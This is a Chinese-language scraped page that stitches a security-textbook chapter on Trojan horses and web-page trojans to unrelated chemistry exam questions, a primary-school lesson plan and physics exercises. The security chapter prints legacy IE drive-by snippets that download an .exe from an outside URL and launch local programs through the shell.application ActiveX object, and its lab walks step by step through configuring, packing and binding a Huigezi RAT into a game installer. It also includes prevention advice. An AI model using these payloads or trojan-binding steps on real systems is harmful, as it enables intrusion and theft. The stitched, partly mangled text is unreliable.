特洛伊木马
特洛伊木马(Trojan Horse)又称木马,是一种通过各种方法直接或者间接与远程计算机之间建立起连接,使远程计算机能够通过网络控制本地计算机的程序。这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢。到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名,有“一经潜入,后患无穷”之意。
通常木马并不被当成病毒,因为它们通常不包括感染程序,因而并不自我复制,只是靠欺骗获得传播。现在,随着网络的普及,木马程序的危害变得十分强大,概括起来,木马的危害有:窃取数据、接受非授权操作者的指令、篡改文件和数据、删除文件和数据、施放病毒、使系统自毁、远程运行程序、跟踪监视对方屏幕、直接屏幕鼠标控制,键盘输入控制、监视对方任务且可以中止对方任务、锁定鼠标键盘和屏幕、远程重启和关机、远程读取和修改注册表、共享被控制端的硬盘等。
远程控制概述。要了解木马,首先应了解远程控制。所谓远程控制,是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,联通需被控制的计算机,将被控计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。这里的远程不是字面意思的远距离,一般指通过网络控制远端电脑。早期的远程控制往往指在局域网中的远程控制而言,随着互联网的普及和技术革新,现在的远程控制往往指互联网中的远程控制。当操作者使用主控端电脑控制被控端电脑时,就如同坐在被控端电脑的屏幕前一样,可以启动被控端电脑的应用程序,可以使用或窃取被控端电脑的文件资料,甚至可以利用被控端电脑的外部打印设备(打印机)和通信设备(调制解调器或者专线等)来进行打印和访问外网和内网,就像利用遥控器遥控电视的音量、变换频道或者开关电视机一样。不过,有一个概念需要明确,那就是主控端电脑只是将键盘和鼠标的指令传送给远程电脑,同时将被控端电脑的屏幕画面通过通信线路回传过来。也就是说,控制被控端电脑进行操作似乎是在眼前的电脑上进行的,实质是在远程的电脑中实现的,不论打开文件,还是上网浏览、下载等都是存储在远程的被控端电脑中的。远程控制必须通过网
络才能进行。位于本地的计算机是操纵指令的发出端,称为主控端或客户端,非本地的被控计算机叫做被控端或服务器端。“远程”不等同于远距离,主控端和被控端可以是位于同一局域网的同一房间中,也可以是连入Internet的处在任何位置的两台或多台计算机。
远程控制软件一般分客户端程序(Client)和服务器端程序(Server)两部分,通常将客户端程序安装到主控端的电脑上,将服务器端程序安装到被控端的电脑上。使用时客户端程序向被控端电脑中的服务器端程序发出信号,建立一个特殊的远程服务,然后通过这个远程服务,使用各种远程控制功能发送远程控制命令,控制被控端电脑中的各种应用程序运行。远程控制并不神秘,Windows XP系统中就提供了多种简单的远程控制手段,如远程桌面连接。目前市场上有很多远程控制软件,如PCAnywhere就是一款功能强大的远程控制软件。PCAnywhere是由赛门铁克(Symantec)公司出品的远程控制软件,它功能强大,几乎支持所有的网络连接方式与网络协议,利用PCAnywhere,计算机管理人员可以轻松地实现在本地计算机上控制远程计算机,使得两地的计算机可以协同工作。在实现远程控制的同时,PCAnywhere 还拥有更为完善的安全策略与密码验证机制,从而保证了远程被控主机的安全。
远程控制虽然可以方便地操纵远程计算机,但它也可能给远程计算机带来安全隐患。因为远程计算机一旦成为服务端后,其他人只要知道了这台计算机的IP地址和服务端口,就可以对其控制,带来安全隐患。黑客正是利用了远程控制软件的这种特点,设计了木马程序。其实木马程序的工作原理和远程控制软件是一样的,木马就是一种基于远程控制技术的黑客工具,只是它具有破坏性、隐藏性和非传播性等特点而异。
木马程序一般也是由两部分组成,分别是服务器端和客户端。服务器端程序指的是运行在被控制的电脑的木马程序,该程序为.exe后缀的可执行文件。客户端程序安装在控制端,客户端能够对服务器端的控制。在Windows系统中,木马一般作为一个网络服务程序在中了木马的计算机后台运行,监听本机一些特定端口,这个端口号多数比较大(5000以上,但也有少数是5000以下的)。当该木马相应的客户端程序在此端口上请求连接时,它会与客户程序建立TCP连接,从而被客户端远程控制。
木马和常规远程控制软件的相同点:
1.常规远程控制软件和木马都是用一个客户端通过网络来控制服务端,控制端可以是WEB,也可以是手机,或者电脑,可以说控制端植入哪里,哪里就可以成为客户端,服务端也同样如此;
2.常规远程控制软件和木马都可以进行远程资源管理,比如文件上传下载修改;
3.常规远程控制软件和木马都可以进行远程屏幕监控,键盘记录,进程和窕口查看?
木马和常规远程控制软件的区别:
1.木马有破坏性:比如DDOS攻击、下载者功能、格式化硬盘、肉鸡和代理功能;
2.木马有隐蔽性:木马最戾著的特征就是隐蔽性,也就是服务端是隐藏的,并不在被控者桌面显示,不被被控者察觉,这样一来无疑增加了木马的危害性,也为木马窃取密码提供了方便之门。
远程控制和木马在功能上非常相似,木马可以理解为加了恶意功能的远程控制软件。
木马的分类。
根据木马程序的具体功能,可以分为五类:
1.远程访问型木马。远程访问型木马是现在最广泛的特洛伊木马。这种木马起着远程控制的功能,用起来非常简单,只需先运行服务端程序,同时获得远程主机的IP地址,控制者就能任意访问被控制端的计算机。这种木马可以使远程控制者在本地机器上做任何事情,比如键盘记录、上传和下载功能、发送一个“截取屏幕”等等。这种类型的木马有著名的BO (Back Office)和国产的冰河等。
2.密码发送型木马。密码发送型木马的目的是找到所有的隐藏密码,并且在受害者不知道的情况下把它们发送到指定的信箱。大多数这类木马程序不会在每次系统重启时都自动加载,它们大多数使用25号端口发送电子邮件。
3.键盘记录型木马。键盘记录型木马非常简单的,它只做一种事情,就是记录受害者的键盘敲击,并且在Log文件里做完整的记录。这种木马程序随着系统的启动而启动,知道受害者在线并记录每一个用户事件,然后通过邮件或其他方式发送给控制者。
4.破坏型木马:大部分木马程序只窃取信息,不做破坏性的事件,但破坏型木马却以毁坏并且删除文件为目的。它们可以自动删除受控计算机上所有的.ini.exe文件,甚至格式化受害者的硬盘,系统中的信息会在顷刻间“灰飞烟灭”。
5.FTP型木马:FTP 型木马打开被控制计算机的21号端口,使任何人无需密码就可以用一个FTP客户端程序连接到受控制端计算机,并且可以进行最高权限的上传和下载,窃取受害者的机密文件。
根据木马的网络连接方向,可以分为两类:
1.正向连接型:发起通信的方向为控制端向被控制端发起,这是传统技术,其缺点是不能透过防火墙。
2.反向连接型:发起通信的方向为被控制端向控制端发起,其出现主要是为了解决从内向外不能发起连接的情况的通信要求,已经被较新的木马广泛采用。
黑客要控制远程计算机,必须先将木马程序的服务端程序植入远程计算机中。目前黑客一般通过如下几种方式进行传播:
1.通过E-Mail附件传播;
2.通过网页传播;
3.通过文件传输;
4.通过系统漏洞直接种植。
12.1 网页木马
12.1.1 背景描述
随着信息技术的不断发展,互联网网站已经成为信息传播、流通、交换及存储的重要手段,但是由于承载网站的应用程序具有自身无法完全克服的漏洞问题,为黑客的入侵提供了可乘之机。利用网站漏洞,尤其是WEB 应用程序漏洞:如 SQL 注入等,黑客能够得到 Web 服务器的控制权限,随意篡改网页内容或窃取重要内部数据,更为严重的则是在网页中植入恶意代码,既“网页挂马”。通过这一行为,黑客可以控制网站的访问者甚至包括网站本单位的人员的计算机,从而实现盗取银行帐号、内部机密信息等各种不可告人的目的。由于网页木马制作的简单性和网络漏洞存在的必然性,通过网站漏洞进行网页挂马已经成为当前最流行的网站攻击方法和最受黑客青睐的木马散播方式。
超级巡警团队、数据安全实验室(DSWLAB)等相关部门汇总数据表明:2008年上半年,网页木马急骤增长,专业化、团队式的木马制造者,在攫取巨额非法利益的同时,给广大网民的正常工作学习带来了很大的不便,使网友们的利益受到了极大的损失。巨额利润、Web 应用程序漏洞、社会工程学成为2008年上半年的网页木马增长的主要条件。很多流行病毒(如:机器狗、磁碟机、游戏盗号病毒等)除了利用程序自身的传播机制进行传播外,也都会利用各种网页木马来扩大其破坏范围。
图12-1-1网马增长曲线图
从图12-1-1中可以看出,短短十周的时间内国内网络上的网页木马竟达到了10多倍的增长。由于一个网页木马对应着成百上千的,甚至是数以万计的计算机网络用户,所以通过网页木马被感染的计算机是放射性增长的。超级巡警团队监控数据显示,在抽样调查所统计的时间内,被感染的网页数量达到1449034,几乎是平均每个网民每天至少会浏览到一个恶意链接。被感染的网页增长走势如下图12-1-2:
图12-1-2被感染网页增长曲线图
根据瑞星“云安全”数据中心的统计数据(见图12-1-3和图12-1-4)表明,2009年上半年,瑞星“云安全”系统拦截到的挂马网页数累计达2.9亿个,共有11.2亿人次网民遭木马攻击,平均每天有622万余人次网民访问挂马网站;其中大型网站、流行软件被挂马的有35万个(以域名计算)。网民被挂马网站攻击成功时使用的软件,主要是各种浏览器,以及内嵌了网页的流行软件。根据以上瑞星公司的统计研究表明,目前的互联网非常脆弱,各种热点新闻、流行软件、社交(SNS)网站、浏览器插件的漏洞层出不穷,为黑客提供了大量入侵和攻击的机会。网页取代网络成为攻击活动的主要渠道,“挂马网页”已经成为黑客传
播病毒的主要手段。目前90%以上的木马病毒通过“挂马”方式传播,这些几乎都源于系统漏洞、后台服务器存在不安全设置、网站实现代码缺陷(如SQL注入、论坛代码缺陷、跨站脚本等)、或网站提供Web服务的程序漏洞、IIS漏洞、Apache漏洞等隐患,给黑客可乘之机;其中访问量越大的网站越有被挂马的可能,因为此类网站被黑客关注程度较高;另外就是政府机关网站、各大中型企业网站,由于专业性技术人员缺乏,网站大多由第三方公司外包开发,存在缺陷较多,也最容易被挂马。
图12-1-3 2009年上半年截获木马网站数量统计
图12-1-4 2009年上半年挂马网站攻击次数统计
另据中国教育和科研计算机网计算机安全应急相应组2010年6月的统计,挂马网站数量仍呈上升趋势,并且占当月攻击事件总和的39%,如图12-1-5所示。
图12-1-5 2010年05月~06月CERNET安全投诉事件统计
网页木马作为打开网络上计算机的“弹头”,它会通过各种系统漏洞或应用程序漏洞,率先获取网络终端计算机的某种权限。通过已经获得的权限,去指定的服务器下载回来“有效载荷”。而这些“有效载荷”就是数十个盗取各种游戏软件、即时通讯软件、邮箱等密码或敏感信息的木马。
12.1.2 工作原理
1.网页木马的基本概念
网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
“网页木马”并非万能的,它一般是通过系统中的漏洞(例如浏览器的漏洞、浏览器插件的漏洞等)来对用户的主机进行攻击,进而获取用户主机中的敏感数据,例如QQ号、网银账号、游戏ID等。如果主机已经安装了最新的安全补丁,大多数网页木马都无法对该主机造成伤害。但是,也有不少网页木马是通过系统未公开的漏洞来攻击用户主机,即是说,即使用户主机安装齐全所有安全补丁,也无法做到100%免疫。
2.网页木马流行的原因。
(1)网页木马在各种网络威胁中技术含量相对来说属于较低的类型。这就意味着他便于制作推广;
(2)免费空间的增多和个人建站的流行,给网页木马客观附带的造就了很大的生存空
间;
(3)国内上网人数的奇迹般的递增,使网页木马的受众层增多;
(4)国内上网人群目前普遍安全意识较低,很多人使用盗版系统,有时候无法更新补丁或及时更新补丁,使针对ie漏洞型的网页木马生存时间延长;
(5)网页木马见效快;
(6)很多间接推动网络安全,擅长脚本技术的人很及时地推出了众多简便式的网页木马生成器或网页木马程式。
3.网页木马的攻击原理
打开一个网页,IE浏览器不会自动下载程序和运行程序,这是因为,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面列举一些IE浏览器等存在的漏洞来分别说明为什么利用网页木马可以下载程序和运行程序。
(1)下载可执行文件
index里有一个代码漏洞< LINK href="ray.exe" rel=stylesheet type=text/css >,IE会把可执行文件误认为CSS样式表而下载到IE的临时文件目录。
可以利用< SCRIPT LANGUAGE="icyfoxlovelace" src="< A href= 'https://www.doczj.com/doc/537905491.html,/1.exe">< /SCRIPT'>https://www.doczj.com/doc/537905491.html,/1.exe">< /SCRIPT>这段代码,把这段代码插入到网页源代码的…之间,运行后就会发现在IE的临时目录Temporary Internet Files下,已经下载了1.exe这个病毒文件。
(2)自动运行程序
< SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application");https://www.doczj.com/doc/537905491.html,space("c:\\Windows\\").items().ite m("Notepad.exe").invokeverb(); < /SCRIPT>
把这段代码插入到网页源代码的…之间,然后用IE打开该网页,这段代码可以在IE 中自动打开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,就可以用它自动运行本地电脑上的任意程序。
通过以上的例子可以看出,利用IE的漏洞,在网页中插入相关的代码,IE完全可以自动下载和运行程序。不过,IE一旦打了相关补丁,这些代码就会失去作用。
另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃
避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理。
4.网页木马的基本工作流程:
(1)受众打开含有网页木马代码的网页;
(2)网页木马利用ie漏洞或者一些脚本功能下载一个可执行文件或脚本。
5.网页木马的防范:
只靠杀毒软件和蓝盾防火墙等是远远不够的,因为一旦黑客使用了反弹端口的个人版木马(个人反汇编的一些杀毒软件无法识别的木马),那么杀毒软件和防火墙就无可奈何,所以,网页木马的防范要从它的原理入手,从根本上进行防范。(1)即时安装安全补丁。经常到相关网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。(2)提高IE的安全级别,禁用脚本和ActiveX控件。网页木马是利用IE脚本和ActiveX控件上的一些漏洞下载和运行木马的,只要禁用了脚本和ActiveX控件,就可以防止木马的下载和运行。然而,禁用脚本和ActiveX控件会使一些网页的功能和效果失去作用,所以是否禁用,要根据自己对安全的需要来定。除此之外,还应该做到:(1)加强服务器的安全管理,避免被黑客入侵或者感染病毒。(2)安装ARP防火墙,避免受局域网内ARP欺骗程序、ARP病毒的影响。
12.1.3 实验列表
【实验一】网页木马实验
【实验分析】
实验目的:
●掌握网页木马的基本概念与木马的特点。
●了解网页木马的流行原因。
●理解网页挂马技术的整个详细流程。
●掌握网页木马的防范策略。
场景描述:
图12-1-6 实验拓扑图
本实验可以在虚拟机环境下完成,实验拓扑图如图12-1-6所示,对应IP地址与角色如表12-1-1所示。实验思路是攻击主机将捆绑了木马的工具放到web服务器上,让受害主机从web服务器下载捆绑了木马的工具并执行。
表12-1-1 对应IP地址与角色
实验工具:万能文件免杀捆绑器、灰鸽子2008。
【实验步骤】
1.攻击源机器网络配置如下(图12-1-7):
图12-1-7 攻击源网络配置
2.受害机器网络配置如下(图12-1-8):
图12-1-8 受害主机网络配置
3.WEB服务器的网络配置如下(图12-1-9):
图12-1-9 WEB服务器的网络配置
4.运行灰鸽子软件,准备生成灰鸽子木马服务端程序(图12-1-10):
图12-1-10灰鸽子2008主界面
5.点击“配置服务程序”,在说明栏中输入“192.168.228.177”(图12-1-11)
图12-1-11 配置服务端程序
6.选择“安装选项”,在“程序安装成功后提示安装成功”前打上勾;
7.在“高级选项中”,“使用UPX加壳”,点击“生成服务器”(图12-1-12),生成
灰鸽子木马程序文件“Server.exe”,将Server.exe复制到“连连看”文件夹;
8.运行Files.exe万能文件免杀捆绑器(图12-1-13);
9.添加捆绑文件“llk46jzb.exe”和“Server.exe”(图12-1-14);
图12-1-14 点击右侧的“添加文件”选项后,添加要捆绑的文件10.点击“捆绑文件”,保存生成了被捆绑了木马程序的游戏程序文件。(注意给捆绑木
马修改个名字如:游戏之类的)(图12-1-15);
图12-1-15 点击“捆绑文件”按钮进行文件捆绑
11.打开攻防实验室,点击“网页挂马”,将文件上传到“网页挂马”(图12-1-16);
图12-1-16 打开实验页面并上传捆绑木马文件
`12.打开实验页面,点击“连连看游戏点击下载”并安装游戏(图12-1-17);
图12-1-17 点击“连连看游戏点击下载”安装游戏;
13.在受害主机里,在网页上下载游戏并运行,哪么捆绑在一起的木马程序也将自动运行,下载连连看游戏并安装。安装完成后提示安装成功。运行“连连看”游戏,也能正常运行。
14.回到攻击主机,灰鸽子上显示中了木马的机器已经上线,这下就可以控制这台中马的机器了,在攻击源机器上的灰鸽子软件上可以看到目标机器的相关信息情况(图12-1-18);
图12-1-18 在攻击端连接目标成功
15.可以远程登陆到受害主机的桌面,也可以在命令行下查看远程机器的网络配置(图12-1-19)。
图12-1-19 远程登录目标主机桌面
高考化学二轮复习专题: 专题十二化学实验基础与综合实验探究 (建议用时:90分钟) 一、选择题:每小题只有一个选项符合题意。 1.《本草纲目》中记载了烧酒的制造工艺:“凡酸坏之酒,皆可蒸烧……以烧酒复烧二次……价值数倍也”。其方法与分离下列物质的实验方法原理上相同的是( ) A.苯和水B.硝酸钾和氯化钠 C.乙酸乙酯和乙酸D.食盐水和泥沙 解析:选C。烧酒的制造工艺利用的方法是蒸馏,可用于分离沸点不同的互溶的液体混合物。A项,苯和水互不相溶,可用分液的方法分离,错误;B项,硝酸钾和氯化钠的溶解度受温度变化影响不同,可用重结晶的方法分离,错误;C项,乙酸乙酯和乙酸的沸点不同,可用蒸馏的方法分离,正确;D项,泥沙不溶于水,可用过滤的方法分离,错误。 2.化学药品的安全存放是非常重要的。下列有关化学药品存放的说法不正确的是( ) A.液溴易挥发,应用少量的水液封并放在冷暗处保存 B.漂白粉长期敞口露置于空气中 C.金属钠遇到氧气和水均立即反应,应保存在煤油或液体石蜡里 D.盐酸易挥发,应用细口试剂瓶密封并放在冷暗处保存 解析:选B。A项,液溴易挥发,由于液溴的密度比水的大,且在水中溶解度不大,所以应用少量的水液封并放在冷暗处保存,正确;B项,漂白粉长期敞口露置于空气中易失效,失去漂白能力,应保存在密闭容器中并置于阴凉处,错误;C项,金属钠遇到氧气和水均立即反应,保存时要隔绝空气和水,由于钠的密度比煤油和液体石蜡大,与它们均不能发生反应,故应保存在煤油或液体石蜡里,正确;D项,盐酸易挥发,应用细口试剂瓶密封并放在冷暗处保存,正确。 3.下列实验装置不能达到相应实验目的的是( )
解析网页后门与网页挂马原理 转自IT168 网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。 一、前置知识 网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。 二、网页挂马的类型 1、框架嵌入式网络挂马 网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下: 解释:在打开插入该句代码的网页后,就也就打开了https://www.doczj.com/doc/537905491.html,/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码: 在“百度”中嵌入了“IT168安全版块”的页面,效果如图1。(图1)
苏教版语文六年级下册 12 夜晚的实验 一、教学目标: 1.学会本课3个生字,理解由生字组成的新词。 2.正确、流利、有感情地朗读课文,概括课文主要内容,能联系课文语言环境,懂得课后作业中“瞎子”、“穿透”、“听|”等词的意思及其所带引号的用法。 3.通过朗读、复述等一系列语言训练,感受并学习科学家细心观察、善于思考、大胆实验、潜心研究、遭受失败不气馁、善于反思,不断利用科学技术造福人类的科学精神。 4.细读课文第二部分,体会作者是如何把“第一次实验”的过程写具体的,学习作者详略得当的写作方法。采用先分次再整体的方法复述实验的过程。 二、教学重、难点: 重点:学习科学家细心观察、善于思考、大胆实验、潜心研究、遭受失败不气馁、善于反思,不断利用科学技术造福人类的科学精神。 难点:在读中整体感知,在读中有所感悟,在读中培养语感,在读中受到情感的熏陶。 三、教学评价设计: 1.在检查学生预习环节,通过查看预习单、听写、轮读、汇报、交流等形式了解学生独立识字、写字、读书及对课文内容掌握情况,以学定教。 2.在初读感知环节,通过给段落加小标题,提炼课文内容,理清文章的表达顺序,进一步提升学生整体把握文本的能力。 3.在精读感悟环节,采用默读、圈画、批注、交流、汇报等形式,引导学生抓住关键词句并联系上下文理解课文内容,学习科学家细心观察、善于思考、大胆实验、潜心研究、遭受失败不气馁、善于反思,不断利用科学技术造福人类的科学精神。 4.在整个学习过程中,关注学生的情感体验,及时作出鼓励性的评价,注意培养学生自主学习、合作学习的意识和能力。
5.借助拓展小练笔,搜集有关仿生学的知识和例子,促进学生语文素养的提高。 四、教与学的准备: 学生:完成预习单。(见后附件1) 教师:1.查看学生预习单,了解学情。 2.多媒体课件。 五、教学课时:2 课时 六、教学设计: 第一课时 环节一、整体感知——初读感知,整体把握 (一)导入新课 课件导入 1 .播放运用超声波来为飞机、轮船导航,超声波治病,超声波勘探的几组CAI 课件,让学生体会超声波的广泛用途。 (“超声波”这个词语对六年级的学生来说还是比较陌生的。通过课件的介绍,一方面让他们了解超声波的知识,另一方面也为学习课文设下悬念。 ) 2 .你们知道超声波是怎样被发现的吗?它缘于一位科学家的夜间实验。 3 .出示课题:《夜晚的实验》。 板书课题:夜晚的实验(读题) 看了课题,你想知道什么? 有什么疑问吗? (此课题信息储藏量大,学生可能会提很多问题。如:谁做实验?为什么在夜晚做实验?怎样做实验?实验的结论是什么?它与超声波有何联系?等等。) (二)借助预习单,检查预习。 1.检查生字的识、写。 (1)投影出示预习单,检查学生对文中难读和易读错词语的朗读,指导学生读准多音字“核”以及外国人名。
专题十二化学实验基础与综合探究 1.(2012·高考福建卷)下列做法不正确的是() A.易燃试剂与强氧化性试剂分开放置并远离火源 B.用湿润的红色石蕊试纸检验氨气 C.在50 mL量筒中配制0.1000 mol·L-1碳酸钠溶液 D.金属钠着火时,用细沙覆盖灭火 2.(2012·高考天津卷)完成下列实验所选择的装置或仪器(夹持装置已略去)正确的是() A.中和滴定实验时,用待测液润洗锥形瓶 B.盛放NaOH溶液时,使用带玻璃塞的磨口瓶 C.用苯萃取溴水中的溴时,将溴的苯溶液从分液漏斗下口放出 D.NaCl溶液蒸发结晶时,蒸发皿中有晶体析出并剩余少量液体即停止加热 4.(2012·高考课标全国卷)下列叙述中正确的是() A.液溴易挥发,在存放液溴的试剂瓶中应加水封 B.能使润湿的淀粉KI试纸变成蓝色的物质一定是Cl2 C.某溶液加入CCl4,CCl4层显紫色,证明原溶液中存在I- D.某溶液加入BaCl2溶液,产生不溶于稀硝酸的白色沉淀,该溶液一定含有Ag+ 5.(2012·高考广东卷)下列实验能达到目的的是() A.用溴水鉴别苯和正己烷 B.用BaCl2溶液鉴别SO2-4和SO2-3 C.用浓HNO3与Cu反应制备NO2 D.将混有HCl的Cl2通入饱和NaHCO3溶液中除去HCl 6.(2012·高考江苏卷)用下列实验装置进行相应实验,能达到实验目的的是()
A.用图1所示装置除去Cl2中含有的少量HCl B.用图2所示装置蒸干NH4Cl饱和溶液制备NH4Cl晶体 C.用图3所示装置制取少量纯净的CO2气体 D.用图4所示装置分离CCl4萃取碘水后已分层的有机层和水层 7.(2012·高考安徽卷)仅用下表提供的玻璃仪器(非玻璃仪器任选)就能实现相应实验目的 的是() 酸乙酯的制取,叙述正确的是() A.①④必须加热B.②③必须隔热 C.①②必须用指示剂D.③④必须用催化剂 9.(2012·高考浙江卷)水溶液X中只可能溶有K+、Mg2+、Al3+、AlO-2、SiO2-3、SO2-3、CO2-3、 SO2-4中的若干种离子.某同学对该溶液进行了如下实验: 下列判断正确的是() A.气体甲一定是纯净物 B.沉淀甲是硅酸和硅酸镁的混合物 C.K+、AlO-2和SiO2-3一定存在于溶液X中 D.CO2-3和SO2-4一定不存在于溶液X中
2014年普通高等学校招生全国统一考试化学试题分类汇编 专题十二化学实验基础 1.(2014·重庆理综化学卷,T4)茶叶中铁元素的检验可经过以下四个步骤完,各步骤中选用的实验用品不能都用到的是( ) A.将茶叶灼烧灰化,选用①、②和⑨ B.用浓硝酸溶解茶叶灰并加蒸馏水稀释,选用④、⑥和⑦ C.过滤得到的滤液,选用④、⑤和⑦ D.检验滤液中的Fe3+,选用③、⑧和⑩ 【答案】B 【解析】A、灼烧茶叶,需要用到的仪器有:坩埚、酒精灯、泥三角,A正确;B、溶解应该在烧杯中进行,并且在溶解的过程中要用玻璃棒不断搅拌,此实验用不到容量瓶,B错误;C、过滤用到的仪器有:漏斗、烧杯和玻璃棒,C正确;D、检验溶液是否含有Fe3+要用到的仪器有试管、胶头滴管,试剂有KSCN溶液,D正确。 2.(2014·重庆理综化学卷,T2)下列实验可实现鉴别目的是( ) A.用KOH溶液鉴别SO3(g)和SO2 B.用湿润的碘化钾淀粉试纸鉴别Br2(g)和NO2 C.用CO2鉴别NaAlO2溶液和CH3COONa溶液 D.用BaCl2溶液鉴别AgNO3溶液和K2SO4溶液 【答案】C
【解析】A、SO2和SO3与KOH反应均没有明显现象,无法鉴别;B、Br2和NO2均能使溶液中的I-氧化成I2,均可以使湿润的淀粉KI试纸变蓝,无法鉴别;C、CO2与NaAlO2反应产生Al(OH)3白色沉淀,CO2与CH3COONa反应无明显现象,可以鉴别;D、二者均产生白色沉淀,无法鉴别。 3.(2014·浙江理综化学卷,T8)下列说法正确的是 A.金属汞一旦洒落在实验室地面或桌面时,必须尽可能收集,并深埋处理 B.用pH计、电导率仪(一种测量溶液导电能力的仪器)均可监测乙酸乙酯的水解程度 C.邻苯二甲酸氢钾可用于标定NaOH溶液的浓度。假如称量邻苯二甲酸氢钾时电子天平读数比实际质量偏大,则测得的NaOH溶液浓度比实际浓度偏小 D.向某溶液中加入茚三酮试剂,加热煮沸后溶液若出现蓝色,则可判断该溶液含有蛋白质 【答案】B 【解析】A金属汞深埋会产生汞蒸气,汞离子本身也是污染物,A错误;乙酸乙酯水解生成乙酸是弱电解质,导电性增加,B正确;邻苯二甲酸氢钾可用于标定NaOH溶液的浓度,假如称量邻苯二甲酸氢钾时电子天平读数比实际质量偏大,即实际计量减小,滴定加入的体积偏大,则测得的NaOH溶液浓度比实际浓度偏大,C错误;向某溶液中加入茚三酮试剂,加热煮沸后溶液若出现蓝色,可能含有氨基酸,D 错误。 4.(2014·天津理综化学卷,T2)实验室制备下列气体时,所用方法正确的是() A.制氧气时,用Na2O2或H2O2作反应物可选择相同的气体发生装置 B.制氯气时,用饱和NaHCO3溶液和浓硫酸净化气体 C.制乙烯时,用排水法或向上排空气法收集气体 D.制二氧化氮时,用水或NaOH溶液吸收尾气 【答案】A 【解析】A、用Na2O2和水反应制取氧气,与用在MnO2催化下分解H2O2制取氧气的发生装置相同,A项正确;B、饱和NaHCO3溶液显碱性,能与氯气反应,B项错误;C、相同条件下,乙烯的密度
初中物理力学实验专题训练 1.天平:某同学用托盘天平测量物体质量时 (1)他把已经调节好的托盘天平搬到另一实验桌上,则使用前应() A.只要将天平放在水平台上B.只要调节横梁平衡 C.不需要再调节D.先将天平放在水平台上,再调节横梁平衡 (2)当他把天平重新调好后,就把药品放在天平的右盘中,用手向左盘中加减砝码,并移动游码,直到指针指到分度盘的中央,记下盘中砝码的质量就等于物体的质量。他的操作中的错误是。 (3)当他改用正确的操作方法后,盘中砝码和游码的位置如图3所示,则物体的质量是。 2.量筒:用量筒测液体的体积时,筒中的液面是凹形的,测量者的视线应与凹面的____相平(填“顶部”、“底部”)。如图4所示,其中同学读数正确,量筒中液体的体积为 cm3。测量形状不规则的固体体积,由图5可知,液体的体积为_____cm3,固体的体积为____cm3。 3.弹簧测力计:使用弹簧测力计应注意的是:使用前要观察量程和分度值,指针要___________。使用过程中,指针、弹簧不得与外壳有摩擦.使用过程中,拉力不能超过弹簧测力计的_________。如图6所示,弹簧测力计测量范围是_______,指针所示被测物重是______N。 4.压强计:研究液体压强所用的仪器是_______,它是根据U形管两边液面出现的_________来测定液体内部压强的。 (1)在做“液体内部的压强”实验时,如图7所示,该实验的现象说明。 图7
(2 序号液体深度 (cm) 橡皮膜 方向 压强计 左液面 (mm) 右液面 (mm) 液面高度差 (mm) 1 水 3朝上18621428 23朝下18621428 33朝侧面18621428 46朝侧面17122958 59朝侧面15824284 6盐水9朝侧面15424692 根据上表中的数据,比较序号为___________的三组数据可得出结论:液体的压强随深度增加而增大;比较序号为__________的三组数据可提出结论:在同一深度,液体向各个方向的压强相等;比较序号为______________的两组数据可得出结论:不同液体的压强还跟密度有关。 5.如图12所示,是一个小球运动时的频闪照片,频闪时间间隔为0.02s,闪亮时间千分之一秒可忽略不计。根据照片记录的小球位置,分析解决下列问题: (1)小球从位置a 运动到位置d所用的时间是多少? (2)小球所作的运动是不是匀速运动?判断的依据是什么? (3)小球从位置a 运动到位置d 的平均速度有多大? 图12 6.小明同学通过实验来研究影响浮力大小的因素,做了如图18所示的一系列实验。 图18
